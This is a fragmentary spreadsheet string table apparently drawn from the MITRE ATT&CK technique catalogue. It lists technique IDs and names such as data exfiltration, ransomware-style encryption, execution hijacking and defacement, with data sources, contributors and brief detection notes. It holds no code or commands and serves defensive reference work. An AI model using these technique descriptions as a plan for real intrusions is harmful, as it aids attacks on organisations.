  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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IaaS, Linux, Windows, macOS</t>
  </si>
  <si>
    <t>Cloud Storage: Cloud Storage Deletion, Command: Command Execution, File: File Deletion, File: File Modification, Image: Image Deletion, Instance: Instance Deletion, Process: Process Creation, Snapshot: Snapshot Deletion, Volume: Volume Deletion</t>
  </si>
  <si>
    <t>Brent Murphy, Elastic; David French, Elastic; Prasad Somasamudram, McAfee; Sekhar Sarukkai, McAfee ; Syed Ummar Farooqh, McAfee; Varonis Threat Labs</t>
  </si>
  <si>
    <t>T1132</t>
  </si>
  <si>
    <t>Data Encoding</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>Itzik Kotler, SafeBreach</t>
  </si>
  <si>
    <t>T1132.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1132.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1486</t>
  </si>
  <si>
    <t>Data Encrypted for Impact</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1486</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</si>
  <si>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</si>
  <si>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Process: Process Creation</t>
  </si>
  <si>
    <t>Oleg Kolesnikov, Securonix</t>
  </si>
  <si>
    <t>T1565</t>
  </si>
  <si>
    <t>Data Manipulation</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values. With some critical processes involving transmission of data, manual or out-of-band integrity checking may be useful for identifying manipulated data.</t>
  </si>
  <si>
    <t>File: File Creation, File: File Deletion, File: File Metadata, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution</t>
  </si>
  <si>
    <t>T1565.003</t>
  </si>
  <si>
    <t>Data Manipulation: Runtime Data Manipulation</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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File: File Creation, File: File Deletion, File: File Metadata, File: File Modification, Process: OS API Execution</t>
  </si>
  <si>
    <t>T1565.001</t>
  </si>
  <si>
    <t>Data Manipulation: Stored Data Manipulation</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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File: File Creation, File: File Deletion, File: File Modification</t>
  </si>
  <si>
    <t>T1565.002</t>
  </si>
  <si>
    <t>Data Manipulation: Transmitted Data Manipulation</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution</t>
  </si>
  <si>
    <t>T1001</t>
  </si>
  <si>
    <t>Data Obfuscation</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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1001.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1001.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1001.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1074</t>
  </si>
  <si>
    <t>Data Staged</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, File: File Access, File: File Creation</t>
  </si>
  <si>
    <t>Praetorian; Shane Tully, @securitygypsy</t>
  </si>
  <si>
    <t>T1074.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1074/001</t>
  </si>
  <si>
    <t>T1074.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1030</t>
  </si>
  <si>
    <t>Data Transfer Size Limits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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1530</t>
  </si>
  <si>
    <t>Data from Cloud Storage Object</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Cloud Storage: Cloud Storage Access</t>
  </si>
  <si>
    <t>Netskope; Praetorian</t>
  </si>
  <si>
    <t>T1602</t>
  </si>
  <si>
    <t>Data from Configuration Repository</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>T1602.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1602/002</t>
  </si>
  <si>
    <t>Identify network traffic sent or received by untrusted hosts or networks. Configure signatures to identify strings that may be found in a network device configuration. (Citation: US-CERT TA18-068A 2018)</t>
  </si>
  <si>
    <t>T1602.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1213</t>
  </si>
  <si>
    <t>Data from Information Repositories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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1213</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</si>
  <si>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</si>
  <si>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Google Workspace, Linux, Office 365, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Logon Session: Logon Session Creation</t>
  </si>
  <si>
    <t>Milos Stojadinovic; Praetorian</t>
  </si>
  <si>
    <t>T1213.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1213.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1005</t>
  </si>
  <si>
    <t>Data from Local System</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1005</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>T1039</t>
  </si>
  <si>
    <t>Data from Network Shared Drive</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>T1025</t>
  </si>
  <si>
    <t>Data from Removable Media</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1491</t>
  </si>
  <si>
    <t>Defacement</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Application Log: Application Log Content, File: File Creation, File: File Modification, Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>T1491.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1491.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1140</t>
  </si>
  <si>
    <t>Deobfuscate/Decode Files or Information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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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File: File Modification, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>Matthew Demaske, Adaptforward; Red Canary</t>
  </si>
  <si>
    <t>Anti-virus, Host intrusion prevention systems, Network intrusion detection system, Signature-based detection</t>
  </si>
  <si>
    <t>T1610</t>
  </si>
  <si>
    <t>Deploy Container</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Defense Evasion, Execution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</si>
  <si>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</si>
  <si>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Application Log: Application Log Content, Container: Container Creation, Container: Container Start, Pod: Pod Creation, Pod: Pod Modification</t>
  </si>
  <si>
    <t>Alfredo Oliveira, Trend Micro; Ariel Shuper, Cisco; Center for Threat-Informed Defense (CTID); Idan Frimark, Cisco; Magno Logan, @magnologan, Trend Micro; Pawan Kinger, @kingerpawan, Trend Micro; Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>T1587</t>
  </si>
  <si>
    <t>Develop Capabilities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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1587.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1587.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1587.004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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1587.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.</t>
  </si>
  <si>
    <t>T1006</t>
  </si>
  <si>
    <t>Direct Volume Access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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, Drive: Drive Access</t>
  </si>
  <si>
    <t>File monitoring, File system access controls</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, Drive: Drive Access, Drive: Drive Modification, Driver: Driver Load, Process: Process Creation</t>
  </si>
  <si>
    <t>T1561.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1561.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1484</t>
  </si>
  <si>
    <t>Domain Policy Modification</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Active Directory: Active Directory Object Creation, Active Directory: Active Directory Object Deletion, Active Directory: Active Directory Object Modification, Command: Command Execution</t>
  </si>
  <si>
    <t>File system access controls, System access controls</t>
  </si>
  <si>
    <t>T1484.002</t>
  </si>
  <si>
    <t>Domain Policy Modification: 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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Active Directory: Active Directory Object Creation, Active Directory: Active Directory Object Modification, Command: Command Execution</t>
  </si>
  <si>
    <t>Blake Strom, Microsoft 365 Defender</t>
  </si>
  <si>
    <t>T1484.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1482</t>
  </si>
  <si>
    <t>Domain Trust Discovery</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>Dave Westgard; Elia Florio, Microsoft; Mnemonic; RedHuntLabs, @redhuntlabs</t>
  </si>
  <si>
    <t>T1189</t>
  </si>
  <si>
    <t>Drive-by Compromise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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Application Log: Application Log Content, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Process: Process Creation</t>
  </si>
  <si>
    <t>Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services); Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)</t>
  </si>
  <si>
    <t>T1568</t>
  </si>
  <si>
    <t>Dynamic Resolution</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>Chris Roffe</t>
  </si>
  <si>
    <t>T1568.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Detection for this technique is difficult because it would require knowledge of the specific implementation of the port calculation algorithm. Detection may be possible by analyzing DNS records if the algorithm is known.</t>
  </si>
  <si>
    <t>T1568.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1568.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1114</t>
  </si>
  <si>
    <t>Email Collection</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation</t>
  </si>
  <si>
    <t>Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)</t>
  </si>
  <si>
    <t>T1114.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1114/003</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</si>
  <si>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</si>
  <si>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Application Log: Application Log Content</t>
  </si>
  <si>
    <t>T1114.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1114.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation</t>
  </si>
  <si>
    <t>T1573</t>
  </si>
  <si>
    <t>Encrypted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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1573.002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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1573.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1499</t>
  </si>
  <si>
    <t>Endpoint Denial of Service</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Application Log: Application Log Content, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Sensor Health: Host Status</t>
  </si>
  <si>
    <t>Alfredo Oliveira, Trend Micro; David Fiser, @anu4is, Trend Micro; Magno Logan, @magnologan, Trend Micro; Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>T1499.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1499.004</t>
  </si>
  <si>
    <t>Endpoint Denial of Service: Application or System Exploitation</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1499.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Sensor Health: Host Status</t>
  </si>
  <si>
    <t>T1499.002</t>
  </si>
  <si>
    <t>Endpoint Denial of Service: Service Exhaustion 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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1611</t>
  </si>
  <si>
    <t>Escape to Host</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Process: OS API Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>Alfredo Oliveira, Trend Micro; Ariel Shuper, Cisco; David Fiser, @anu4is, Trend Micro; Idan Frimark, Cisco; Joas Antonio dos Santos, @C0d3Cr4zy, Inmetrics; Magno Logan, @magnologan, Trend Micro; Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>T1585</t>
  </si>
  <si>
    <t>Establish Accounts</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1585.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1585.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1546</t>
  </si>
  <si>
    <t>Event Triggered Execution</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, File: File Creation, File: File Metadata, File: File Modification, Module: Module Load, Process: Process Creation, WMI: WMI Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1546.008</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Paul Speulstra, AECOM Global Security Operations Center</t>
  </si>
  <si>
    <t>T1546.009</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1546.010</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1546.011</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, File: File Modification, Module: Module Load, Process: Process Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1546.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Administrator, SYSTEM, User</t>
  </si>
  <si>
    <t>T1546.015</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1546.014</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1546.012</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1546.006</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, File: File Metadata, File: File Modification, Module: Module Load, Process: Process Creation</t>
  </si>
  <si>
    <t>T1546.007</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Matthew Demaske, Adaptforward</t>
  </si>
  <si>
    <t>T1546.013</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>T1546.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Bartosz Jerzman</t>
  </si>
  <si>
    <t>T1546.005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1546.004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1546.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, Process: Process Creation, WMI: WMI Creation</t>
  </si>
  <si>
    <t>Brent Murphy, Elastic; David French, Elastic</t>
  </si>
  <si>
    <t>T1480</t>
  </si>
  <si>
    <t>Execution Guardrails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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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FireEye</t>
  </si>
  <si>
    <t>Anti-virus, Host forensic analysis, Signature-based detection, Static file analysis</t>
  </si>
  <si>
    <t>T1480.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1048</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1048</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>Alfredo Abarca</t>
  </si>
  <si>
    <t>T1048.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1048.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1048.003</t>
  </si>
  <si>
    <t>Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1041</t>
  </si>
  <si>
    <t>Exfiltration Over C2 Channel</t>
  </si>
  <si>
    <t>Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1041</t>
  </si>
  <si>
    <t>T1011</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1011.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, Drive: Drive Creation, File: File Access, Process: Process Creation</t>
  </si>
  <si>
    <t>T1052.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1567</t>
  </si>
  <si>
    <t>Exfiltration Over Web Service</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1567.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1567.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1190</t>
  </si>
  <si>
    <t>Exploit Public-Facing Application</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Application Log: Application Log Content, Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>Praetorian; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>T1203</t>
  </si>
  <si>
    <t>Exploitation for Client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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1212</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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John Lambert, Microsoft Threat Intelligence Center</t>
  </si>
  <si>
    <t>T1211</t>
  </si>
  <si>
    <t>Exploitation for Defense Evasion</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1068</t>
  </si>
  <si>
    <t>Exploitation for Privilege Escalation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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Containers, Linux, Windows, macOS</t>
  </si>
  <si>
    <t>Driver: Driver Load</t>
  </si>
  <si>
    <t>Idan Revivo, @idanr86, Team Nautilus Aqua Security; Joas Antonio dos Santos, @C0d3Cr4zy, Inmetrics; Yaniv Agman, @AgmanYaniv, Team Nautilus Aqua Security</t>
  </si>
  <si>
    <t>T1210</t>
  </si>
  <si>
    <t>Exploitation of Remote Services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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1133</t>
  </si>
  <si>
    <t>External Remote Services</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Initial Access, Persistence</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</si>
  <si>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</si>
  <si>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Traffic Flow</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</si>
  <si>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</si>
  <si>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T1008</t>
  </si>
  <si>
    <t>Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1008</t>
  </si>
  <si>
    <t>T1083</t>
  </si>
  <si>
    <t>File and Directory Discovery</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1083</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</si>
  <si>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</si>
  <si>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T1222</t>
  </si>
  <si>
    <t>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation</t>
  </si>
  <si>
    <t>CrowdStrike Falcon OverWatch; Jan Miller, CrowdStrike</t>
  </si>
  <si>
    <t>File system access controls</t>
  </si>
  <si>
    <t>T1222.002</t>
  </si>
  <si>
    <t>File and Directory Permissions Modification: Linux and Mac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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1222/002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</si>
  <si>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</si>
  <si>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Command: Command Execution, File: File Metadata, Process: Process Creation</t>
  </si>
  <si>
    <t>T1222.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1495</t>
  </si>
  <si>
    <t>Firmware Corruption</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1495</t>
  </si>
  <si>
    <t>System firmware manipulation may be detected.(Citation: MITRE Trustworthy Firmware Measurement) Log attempts to read/write to BIOS and compare against known patching behavior.</t>
  </si>
  <si>
    <t>Firmware: Firmware Modification</t>
  </si>
  <si>
    <t>T1187</t>
  </si>
  <si>
    <t>Forced Authentication</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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File: File Access, File: File Creation, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>Sudhanshu Chauhan, @Sudhanshu_C; Teodor Cimpoesu</t>
  </si>
  <si>
    <t>T1606</t>
  </si>
  <si>
    <t>Forge Web Credentials</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Azure AD, Google Workspace, Linux, Office 365, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation, Web Credential: Web Credential Creation, Web Credential: Web Credential Usage</t>
  </si>
  <si>
    <t>T1606.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Office 365, SaaS, Windows</t>
  </si>
  <si>
    <t>Blake Strom, Microsoft 365 Defender; Oleg Kolesnikov, Securonix</t>
  </si>
  <si>
    <t>T1606.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1592</t>
  </si>
  <si>
    <t>Gather Victim Host Information</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1592.004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1592.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1592.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1592.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1589</t>
  </si>
  <si>
    <t>Gather Victim Identity Information</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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1589.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1589.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1589/002</t>
  </si>
  <si>
    <t>T1589.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1590</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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1590.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1590.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1590.005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1590.006</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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1590.004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1590.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1591</t>
  </si>
  <si>
    <t>Gather Victim Org Information</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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1591.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1591.001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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1591.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1591.004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1200</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1564</t>
  </si>
  <si>
    <t>Hide Artifacts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</si>
  <si>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</si>
  <si>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</si>
  <si>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Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts. Monitor event and authentication logs for records of hidden artifacts being used. Monitor the file system and shell commands for hidden attribute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</si>
  <si>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</si>
  <si>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T1564.005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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File: File Modification, Firmware: Firmware Modification, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1564.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation</t>
  </si>
  <si>
    <t>Host forensic analysis</t>
  </si>
  <si>
    <t>T1564.002</t>
  </si>
  <si>
    <t>Hide Artifacts: Hidden Users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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1564/002</t>
  </si>
  <si>
    <t>This technique prevents the new user from showing up at the log in screen, but all of the other signs of a new user still exist. The user still gets a home directory and will appear in the authentication logs.</t>
  </si>
  <si>
    <t>File: File Modification, User Account: User Account Creation, User Account: User Account Metadata</t>
  </si>
  <si>
    <t>T1564.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, File: File Modification, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>T1564.004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution</t>
  </si>
  <si>
    <t>Oddvar Moe, @oddvarmoe; Red Canary</t>
  </si>
  <si>
    <t>Anti-virus, Host forensic analysis, Signature-based detection</t>
  </si>
  <si>
    <t>T1564.006</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Janantha Marasinghe; Menachem Shafran, XM Cyber</t>
  </si>
  <si>
    <t>T1564.007</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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File: File Content, Script: Script Execution</t>
  </si>
  <si>
    <t>Rick Cole, FireEye</t>
  </si>
  <si>
    <t>T1574</t>
  </si>
  <si>
    <t>Hijack Execution Flow</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Defense Evasion, Persistence, Privilege Escalation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</si>
  <si>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</si>
  <si>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Command: Command Execution, File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation, Service: Service Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Anti-virus, Application control</t>
  </si>
  <si>
    <t>T1574.012</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1574.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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File: File Creation, File: File Modification, Module: Module Load</t>
  </si>
  <si>
    <t>T1574.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation</t>
  </si>
  <si>
    <t>T1574.004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Application control</t>
  </si>
  <si>
    <t>T1574.006</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation</t>
  </si>
  <si>
    <t>T1574.005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation, Service: Service Metadata</t>
  </si>
  <si>
    <t>T1574.007</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Stefan Kanthak</t>
  </si>
  <si>
